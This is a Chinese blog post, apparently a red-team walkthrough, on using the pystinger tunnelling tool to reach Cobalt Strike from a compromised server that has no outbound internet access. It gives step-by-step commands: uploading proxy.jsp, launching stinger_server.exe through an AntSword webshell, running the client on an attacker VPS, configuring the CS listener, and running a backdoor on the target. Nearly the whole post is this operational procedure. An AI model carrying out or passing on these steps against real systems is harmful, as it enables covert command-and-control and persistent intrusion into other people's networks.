首页 > 其他分享 >pystinger实现不出网情况下,上线CS的方式

pystinger实现不出网情况下,上线CS的方式

时间:2023-04-25 12:33:47浏览次数:26  
标签:上线 HTTP pystinger 目标 exe jsp CS server

某hw过程中遇到如下情况:

获取到webshell,目标服务器不出网

目标机:内网地址,端口映射到公网ip
vps:
在这里插入图片描述

pystinger地址:

https://github.com/FunnyWolf/pystinger
python3 -m pip install  -r  requirement.txt

目标机操作:

1、proxy.jsp上传到目标服务器,确保http://example.com:8080/proxy.jsp可以访问
,页面返回UTF-8
2、stinger_server.exe上传到目标服务器,
AntSword运行cmdstart D:/XXX/stinger_server.exe启动pystinger-server
不要D:/xxx/singer_server.exe直接运行,会造成TCP断开

互联网微PS操作:

3、python3 ./stinger_client.py -w 
http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

在这里插入图片描述
CS监听器配置

HTTP Hosts:127.0.0.1
HTTP Hosts(stager):目标及内网ip
HTTP Port(C2):60020

在这里插入图片描述
s生成后门在目标机运行
在这里插入图片描述

 

标签:上线,HTTP,pystinger,目标,exe,jsp,CS,server
From: https://www.cnblogs.com/xiaoyunxiaogang/p/17352259.html

相关文章

  • windows环境下emacs的python简单配置
    首先参考了上一篇《emacs极简配置》,我的想法是打开兼容vim的viper到5级,然后一些基本的字体设定,然后如何执行python文件的一个全过程方法。1、先打开emacs,如果忘了怎么用了,看一下自带的教程,还是中文的,超级方便。2、学完后,键入C-xC-f并按~,这样就会打开默认的配置文件所在的目录......
  • HTML+CSS学习--HTML表单标签
    表单1:表单标签<form></form>属性:action='接口地址'method='get/post'name='表单名称'2:表单控件<input>属性:type='控件类型'name:属性标识表单域的名称;Value:属性定义表单域的默认值,其他属性根据type的不同而有所变化。maxlength:控制最多输入的字符数,Size:控制框的宽度(......
  • HTML+CSS学习--HTML表单标签
     关注我了解更多web技术知识,带你一路“狂飙”到底!上岸大厂不是梦!表单1:表单标签<form></form>属性:action='接口地址'method='get/post'name='表单名称'2:表单控件<input>属性:type='控件类型'name:属性标识表单域的名称;Value:属性定义表单域的默认值,其他属......
  • css盒子跟随鼠标绘制点和线
    <!DOCTYPEhtml><html> <head>  <metacharset="utf-8"/>  <title></title>  <style>   html,body{    width:100%;    height:100%;   }      #box{    height:100px; ......
  • use a script run by gromacs to analysis protein protein complex dynamic
    usinggromacstowriteascriptforprotein-proteincomplexmoleculerdynamicsfromforcefieldselectiontotrajectoryanalyzestepbystep,andgiveannotationtoeachlineGROMACSisapowerful moleculardynamicssoftwarepackage usedforsimulati......
  • [CMU 15-418] (Lecture4) Parallel Programming Basics
    本系列文章为CMU15-418/15-618:ParallelComputerArchitectureandProgramming,Fall2018课程学习笔记课程官网:CMU15-418/15-618:ParallelComputerArchitectureandProgramming参考文章:CMU15-418notes相关资源与介绍:CMU15-418/StanfordCS149:ParallelComput......
  • CSE 8B 计算问题求解
    CSE8B:IntroductiontoProgrammingandComputationalProblemSolving-2Assignment2Numbers,Mathematics,Characters,andStringsinJavaDue:Wednesday,April19,11:59PMLearninggoals:●WriteJavacodethatincludes:○Numbers○Mathematicaloperations○S......
  • CS 520 Implementation & testing
    Homework3Implementation&testingYoumayworkwithothersonthisassignment.Eachprogrammingpair,however,mustsubmittheirowncodebase,clearlyspecifyingthecollaborators.Thecodebaseshouldbewritteninthepair’sownwords.Aprogrammingpa......
  • css 渲染优化的方式
    1、加载性能优化:css压缩、css单一样式、减少使用@import,而建议使用link;2、 选择器性能优化:避免使用通配规则*尽量少的去对标签进行选择,而是用class不要去用标签限定ID或者类选择符:ul#nav,应该简化为#nav尽量少的去使用后代选择器,降低选择器的权重值考虑继承3、渲染......
  • ElasticSearch学习资料
    elasticsearch集群正确关闭、重启方式问题原因:在elasticsearch集群中,当集群发现某个节点关闭时,将延迟一分钟后(默认)再开始将该节点上的分片复制到集群中的其他节点,这可能涉及很多I/O。由于该节点不久将要重新启动,因此该I/O是不必要的。您可以通过在关闭节点之前禁用副本......